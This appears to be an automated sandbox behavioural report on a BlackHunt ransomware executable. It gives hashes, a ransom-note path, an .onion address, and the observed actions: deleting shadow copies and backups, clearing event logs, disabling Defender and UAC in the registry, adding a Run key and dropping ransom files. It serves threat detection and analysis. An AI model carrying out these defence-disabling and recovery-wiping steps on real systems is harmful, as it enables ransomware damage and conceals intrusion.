Analysis
-
max time kernel
91s -
max time network
93s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
28-01-2024 16:55
Static task
static1
Behavioral task
behavioral1
Sample
eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe
Resource
win10v2004-20231222-en
General
-
Target
eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe
-
Size
707KB
-
MD5
f61f804d4e954683fde465786ce6fa2c
-
SHA1
6ea10e4f100586e99552889101e64e6bc92b61ef
-
SHA256
a183b5e1befb6280842a93e6e183834682e28641a849c3980df27b5e462a2bb7
-
SHA512
295875e90b0e852911df16bad9bbe1c1319d525b5ee3ac6feb336786e9904e4f8fde238ead1acd6772a58578b7db29bef7cbfef54aa08817653554862d3a087a
-
SSDEEP
6144:/cmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1T84vnh:TuaTmkZJ+naie5OTamgEoKxLWSGh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 3764 fsutil.exe 6204 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 9556 wevtutil.exe 8112 wevtutil.exe 12624 wevtutil.exe 9396 wevtutil.exe 9572 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 1376 bcdedit.exe 508 bcdedit.exe 8148 bcdedit.exe 8248 bcdedit.exe -
Renames multiple (3375) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 6876 wbadmin.exe 14728 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\S: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened (read-only) \??\J: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened (read-only) \??\X: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened (read-only) \??\N: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\O: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened (read-only) \??\P: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened (read-only) \??\L: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened (read-only) \??\M: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened (read-only) \??\T: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened (read-only) \??\Z: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened (read-only) \??\B: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\I: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened (read-only) \??\A: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened (read-only) \??\G: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened (read-only) \??\H: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened (read-only) \??\V: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened (read-only) \??\Y: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\E: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened (read-only) \??\R: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\W: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened (read-only) \??\U: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened (read-only) \??\K: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened (read-only) \??\Q: eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 3 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ro-ro\#BlackHunt_Private.key eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\zh-cn\ui-strings.js eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\#BlackHunt_ReadMe.txt eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files\VideoLAN\VLC\plugins\packetizer\#BlackHunt_ReadMe.hta eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\plugins.dat eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\uk-ua\#BlackHunt_Private.key eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\de-de\ui-strings.js eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\hr-hr\#BlackHunt_Private.key eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\#BlackHunt_ReadMe.hta eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files\VideoLAN\VLC\locale\ta\#BlackHunt_ReadMe.hta eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\#BlackHunt_Private.key eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fr-ma\#BlackHunt_Private.key eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\#BlackHunt_Private.key eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ar-ae\#BlackHunt_ReadMe.txt eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files\VideoLAN\VLC\locale\ast\#BlackHunt_Private.key eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\#BlackHunt_Private.key eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\css\#BlackHunt_ReadMe.hta eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileScanCard_Light.pdf eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\eu-es\#BlackHunt_Private.key eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\nb-no\#BlackHunt_Private.key eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\#BlackHunt_ReadMe.hta eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon_hover_2x.png eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\#BlackHunt_Private.key eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\zh-cn\#BlackHunt_Private.key eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\it-it\#BlackHunt_Private.key eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\sk-sk\#BlackHunt_Private.key eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\pt-br\#BlackHunt_Private.key eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\directshow.md eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\#BlackHunt_ReadMe.hta eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sl-si\ui-strings.js eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sv-se\#BlackHunt_ReadMe.hta eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sk-sk\ui-strings.js eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\it-it\#BlackHunt_ReadMe.hta eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\#BlackHunt_Private.key eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files\VideoLAN\VLC\locale\ru\#BlackHunt_ReadMe.hta eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\cs-cz\#BlackHunt_ReadMe.hta eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\#BlackHunt_ReadMe.txt eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ru-ru\#BlackHunt_Private.key eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\pt-br\PlayStore_icon.svg eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\#BlackHunt_ReadMe.hta eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\css\#BlackHunt_ReadMe.txt eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\hr-hr\#BlackHunt_Private.key eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\pt-br\#BlackHunt_ReadMe.txt eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\hu-hu\ui-strings.js eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\vlc.mo eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ar-ae\#BlackHunt_Private.key eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\he-il\#BlackHunt_Private.key eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\example_icons.png eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\#BlackHunt_Private.key eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\zh-tw\#BlackHunt_ReadMe.hta eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\pt-br\#BlackHunt_ReadMe.hta eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\#BlackHunt_ReadMe.hta eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\da-dk\#BlackHunt_ReadMe.txt eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-ae\#BlackHunt_ReadMe.hta eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files\VideoLAN\VLC\locale\brx\#BlackHunt_ReadMe.txt eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\view.html eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files\VideoLAN\VLC\plugins\lua\#BlackHunt_ReadMe.hta eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\sl-sl\#BlackHunt_Private.key eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\uk-ua\#BlackHunt_ReadMe.hta eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sk-sk\#BlackHunt_ReadMe.hta eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\css\#BlackHunt_ReadMe.txt eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\tr-tr\ui-strings.js eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\he-il\#BlackHunt_ReadMe.hta eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\nl-nl\ui-strings.js eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 15036 14868 WerFault.exe 291 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1704 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 4908 vssadmin.exe 3768 vssadmin.exe 4372 vssadmin.exe 2412 vssadmin.exe 4944 vssadmin.exe 8220 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 14388 taskkill.exe -
Modifies registry class 9 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 15084 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1800 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 1800 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe Token: SeRestorePrivilege 1800 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe Token: SeBackupPrivilege 1800 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe Token: SeTakeOwnershipPrivilege 1800 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe Token: SeAuditPrivilege 1800 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe Token: SeSecurityPrivilege 1800 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe Token: SeIncBasePriorityPrivilege 1800 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe Token: SeBackupPrivilege 3036 vssvc.exe Token: SeRestorePrivilege 3036 vssvc.exe Token: SeAuditPrivilege 3036 vssvc.exe Token: SeBackupPrivilege 12828 wbengine.exe Token: SeRestorePrivilege 12828 wbengine.exe Token: SeSecurityPrivilege 12828 wbengine.exe Token: SeSecurityPrivilege 12624 wevtutil.exe Token: SeBackupPrivilege 12624 wevtutil.exe Token: SeSecurityPrivilege 9396 wevtutil.exe Token: SeBackupPrivilege 9396 wevtutil.exe Token: SeSecurityPrivilege 9572 wevtutil.exe Token: SeBackupPrivilege 9572 wevtutil.exe Token: SeSecurityPrivilege 9556 wevtutil.exe Token: SeBackupPrivilege 9556 wevtutil.exe Token: SeSecurityPrivilege 8112 wevtutil.exe Token: SeBackupPrivilege 8112 wevtutil.exe Token: SeDebugPrivilege 14388 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1800 wrote to memory of 864 1800 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 163 PID 1800 wrote to memory of 864 1800 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 163 PID 1800 wrote to memory of 1608 1800 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 92 PID 1800 wrote to memory of 1608 1800 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 92 PID 1800 wrote to memory of 3796 1800 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 94 PID 1800 wrote to memory of 3796 1800 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 94 PID 1800 wrote to memory of 976 1800 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 97 PID 1800 wrote to memory of 976 1800 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 97 PID 864 wrote to memory of 1520 864 Conhost.exe 96 PID 864 wrote to memory of 1520 864 Conhost.exe 96 PID 1800 wrote to memory of 368 1800 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 99 PID 1800 wrote to memory of 368 1800 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 99 PID 1608 wrote to memory of 3480 1608 cmd.exe 204 PID 1608 wrote to memory of 3480 1608 cmd.exe 204 PID 3796 wrote to memory of 1852 3796 cmd.exe 102 PID 3796 wrote to memory of 1852 3796 cmd.exe 102 PID 1800 wrote to memory of 1932 1800 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 103 PID 1800 wrote to memory of 1932 1800 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 103 PID 976 wrote to memory of 4992 976 cmd.exe 105 PID 976 wrote to memory of 4992 976 cmd.exe 105 PID 1800 wrote to memory of 4188 1800 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 106 PID 1800 wrote to memory of 4188 1800 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 106 PID 1800 wrote to memory of 3888 1800 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 108 PID 1800 wrote to memory of 3888 1800 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 108 PID 1800 wrote to memory of 1904 1800 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 112 PID 1800 wrote to memory of 1904 1800 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 112 PID 368 wrote to memory of 2744 368 cmd.exe 110 PID 368 wrote to memory of 2744 368 cmd.exe 110 PID 1800 wrote to memory of 2172 1800 eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe 114 PID 1800 wrote to memory 